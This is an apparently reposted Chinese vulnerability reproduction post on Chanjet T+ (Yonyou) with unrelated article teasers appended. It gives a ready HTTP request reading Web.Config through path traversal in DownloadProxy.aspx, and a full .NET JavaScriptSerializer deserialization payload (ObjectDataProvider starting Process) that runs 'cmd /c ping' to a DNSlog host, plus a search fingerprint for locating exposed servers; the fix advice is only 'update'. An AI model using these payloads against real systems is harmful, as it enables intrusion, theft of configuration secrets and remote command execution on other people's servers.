用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞

news2024/12/23 19:46:37

文章目录

    • 前言
  • 一.用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏
    • 0x01 漏洞描述
    • 0x02 影响版本
    • 0x03 漏洞环境
    • 0x04 漏洞复现
      • 1.构造POC
    • 0x05 修复建议
  • 二.用友畅捷通TPlus远程命令执行漏洞
    • 0x01 漏洞描述
    • 0x02 影响版本
    • 0x03 漏洞环境
    • 0x04 漏洞复现
      • 1.构造POC
      • 2.看DNSlog回显
    • 0x05 修复建议

前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

一.用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏

0x01 漏洞描述

畅捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该系统在DownloadProxy.aspx存在任意文件读取漏洞。

0x02 影响版本

畅捷通T+

0x03 漏洞环境

app=“畅捷通-TPlus”
在这里插入图片描述在这里插入图片描述

0x04 漏洞复现

1.构造POC

GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

在这里插入图片描述发现可以读取web.config文件。

0x05 修复建议

请关注厂商主页及时更新: https://www.chanjet.com/

二.用友畅捷通TPlus远程命令执行漏洞

0x01 漏洞描述

畅捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该漏洞属于.net反序列化场景中的 JavaScriptSerializer反序列化。在.NET处理 Ajax应用的时候,通常序列化功能由JavaSerializer类提供,它是.NET2.0之后内部实现的序列化功能的类,位于命名空间System.Web…Serialization、通过System.Web.Extensions引用,让开发者轻松实现.Net中所有类型和Json数据之间的转换,但在某些场景下开发者使用Deserialize 或DeserializeObject方法处理不安全的Json数据时会造成反序列化攻击从而实现远程RCE漏洞。

简而言之用友畅捷通Tplus存在前台远程代码执行漏洞,攻击者可利用GetStoreWarehouseByStore 方法注入序列化的payload,执行任意命令。最终造成服务器敏感性信息泄露或代码执行。

0x02 影响版本

畅捷通Tplus 13.0 
畅捷通Tplus 16.0

0x03 漏洞环境

app=“畅捷通-TPlus”
在这里插入图片描述
在这里插入图片描述

0x04 漏洞复现

1.构造POC

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Content-Length: 679
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

{
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
              "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c ping xxxxxx.dgrh3.cn"
              }
            }
          }
        }

在这里插入图片描述
出现actorId或archivesId不能为空,则存在该漏洞。

2.看DNSlog回显

在这里插入图片描述有回显说明ping命令成功执行!!!

0x05 修复建议

当前官方已发布安全补丁,建议受影响的用户及时联系产商安装安全补丁。链接如下:
https://www.chanjetvip.com/product/goods/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/954346.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

康希诺:跌跌更有钱途,此时已是关注良机

这几年医药行业二级市场的回报率不理想;动不动的集采大降价,可能使得某些公司的主要产品盈利能力受损,不少医药医疗公司股价显著受压,投资者很是无奈。作为医疗系统一个子行业的疫苗,也大体如此。以康希诺为例&#xf…

WebRTC音视频通话-WebRTC推拉流过程中日志log输出

WebRTC音视频通话-WebRTC推拉流过程中日志log输出 之前实现iOS端调用ossrs服务实现推拉流流程。 推流:https://blog.csdn.net/gloryFlow/article/details/132262724 拉流:https://blog.csdn.net/gloryFlow/article/details/132417602 在推拉流过程中的…

Redis 主从复制和哨兵模式

一、概念 主从复制,是指将一台 Redis 服务器的数据,复制到其他的 Redis 服务器。前者称为主节点(master/leader),后者称为从节点(slave/follower)。数据的复制是单向的,只能由主节点…

利用条件竞争突破优惠券仅能使用一次逻辑限制

Portswigger练兵场之条件竞争 目录 Portswigger练兵场之条件竞争🦄条件竞争-突破一次逻辑限制🚀实验前置必要知识点🏆实验要求⚡️渗透开始1. 站点分析2. 登录3.日志探查4.功能点探究5.完成实验 修复方案 🦄条件竞争-突破一次逻辑…

java八股文面试[多线程]——线程池拒绝策略

四种线程池拒绝策略(handler) 当线程池的线程数达到最大线程数时,需要执行拒绝策略。拒绝策略需要实现 RejectedExecutionHandler 接口,并实现 rejectedExecution(Runnable r, ThreadPoolExecutor executor) 方法。不过…

前端基础2——CSS样式

文章目录 一、使用方式1.1 内联方式1.2 内部方式1.3 外部导入方式(推荐) 二、选择器类型2.1 元素选择器2.2 ID选择器2.3 类选择器2.4 派生选择器 三、常用属性3.1 内边距和外边距3.2 文本3.3 边框3.4 背景3.5 定位3.6 浮动3.7 字体3.8 其他属性 四、案例…

信息技术02--初/高中--分类选择题(377道题与解析)

文章目录 第一章 办公软件 1-96第二章 信息技术基础 1-41第三章 计算机系统基础 1-28第四章 多媒体技术 1-115第五章 计算机网络技术 1-50第六章 信息安全 1-3第七章 算法与程序简介 1-13第八章 数据结构 1-2第九章 数据库技术 1-20第十章 练习 1-9 第一章 办公软件 1-96 1、某…

Cygwin是什么?是Windows还是Linux?

原文作者:gentle_zhou 原文链接:https://bbs.huaweicloud.com/blogs/408674 最近在和客户交流的时候,一直以为客户的研发环境就是windows 7,直到和对面的研发团队交流的时候,得到的反馈是在windows 7系统上安装了Cygw…

C语言深入理解指针(非常详细)(一)

目录 内存和地址内存编址的理解 指针变量和地址取地址操作符(&)指针变量和解引用操作符(*)指针变量如何拆解指针类型解引用操作符 指针变量的大小 指针变量类型的意义指针的解引用指针-整数 const修饰指针const修饰变量const修…

智慧园区封闭化管理之人车定位及轨迹追踪

园区封闭化管理在提高园区安全性、管理效率方面发挥着重要作用,人车定位及轨迹追踪是推动园区智慧封闭化管理的关键技术。本文将探讨人车定位及轨迹追踪技术在智慧园区封闭化管理中的应用,带您了解数字化时代园区管理的创新之路。 一、人车定位技术的突破…

Echarts遇到Vue3时遇到的问题

将vue2的Echarts代码迁移到了vue3项目上,引发的问题 问题描述: 1. 点击图例legend时刻度轴偏移,图像不展示,以及报错 初始chart正常.图 点击图例后的chart和报错.图 2. 调用resize()不生效且报错 初始正常.图 修改屏幕尺寸调用r…

[ Linux Audio 篇 ] Linux Audio 子系统资料集锦

Linux Audio 子系统资料 背景OSS VS ALSAALSA 驱动ALSA libALSA Plugin音频延迟音频调试音频书籍 背景 最近需要准备Linux Audio 相关的PPT,于是将以往的知识点和遇到的问题进行整理和梳理,以便向大家讲解。同时,还整理了在这个过程中发现的…

小技巧,将你的Python代码运行情况用动画实时呈现

咱们初学者练习编程时,常常难以理解简单循环,数据结构,迭代的操作原理。 现在不怕了,我们可以借助一个在线工具逐步执行代码,并直观查看其运行过程。 它是由 Philip Guo 开发的一个免费教育工具,帮助学生攻…

这5个理由告诉你为什么要采用微前端架构

微前端是一种前端开发的架构方法,已经变得越来越流行,这也预示着它很可能代表 Web 开发的未来。所以学习这种架构带来的好处对你的应用程序和开发团队是不言而喻的。 本文将分享我和我的团队使用这种方法两年来的经验所得,以及帮助你分析在你…

仿弹壳特工队,绝地反击活动使用电池翻格子小游戏(JAVA小游戏)

近来太无聊,玩了一款割草游戏,里面有个活动感觉挺好玩的,像扫雷一样,寻找线索(灯泡),在这里使用JAVA语言也简单实现下游戏。 先上效果图,鼠标点击对应的块,可以展开相连的方块,点击…

nvm集合node版本,解决新版本jeecgboot3.5.3前端启动失败问题

jeecgboot前端3.5.3页面如下 使用之前的pnpm启动会报错,pnpm是node进行安装的,查询后发现,vue3版本的页面至少需要node16版本,我之前的版本只有15.5,适用于vue2 那么我将先前的node15.5版本删除,然后安装…

【知识分享】C语言应用-易错篇

一、C语言简介 C语言结构简洁,具有高效性和可移植性,因此被广泛应用。但究其历史的标准定义,C语言为了兼容性在使用便利性作出很大牺牲。在《C陷阱与缺陷》一书中,整理出大部分应用过程中容易出错的点,本文为《C陷阱与…

ffmpeg把RTSP流分段录制成MP4,如果能把ffmpeg.exe改成ffmpeg.dll用,那音视频开发的难度直接就降一个维度啊

比如,原来我们要用ffmpeg录一段RTSP视频流转成MP4,我们有两种方案: 方案一:可以使用以下命令将rtsp流分段存储为mp4文件 ffmpeg -i rtsp://example.com/stream -vcodec copy -acodec aac -f segment -segment_time 3600 -reset_t…

ubuntu20.04+ROS noetic在线运行单USB双目ORB_SLAM

双目摄像头主要有以下几种,各有优缺点。 1.单USB插口,左右图像单独输出2.双USB插口,左右图像单独输出(可能存在同步性问题)3.双USB插口,左右图像合成输出4.单USB插口,左右图像合成输出 官方版…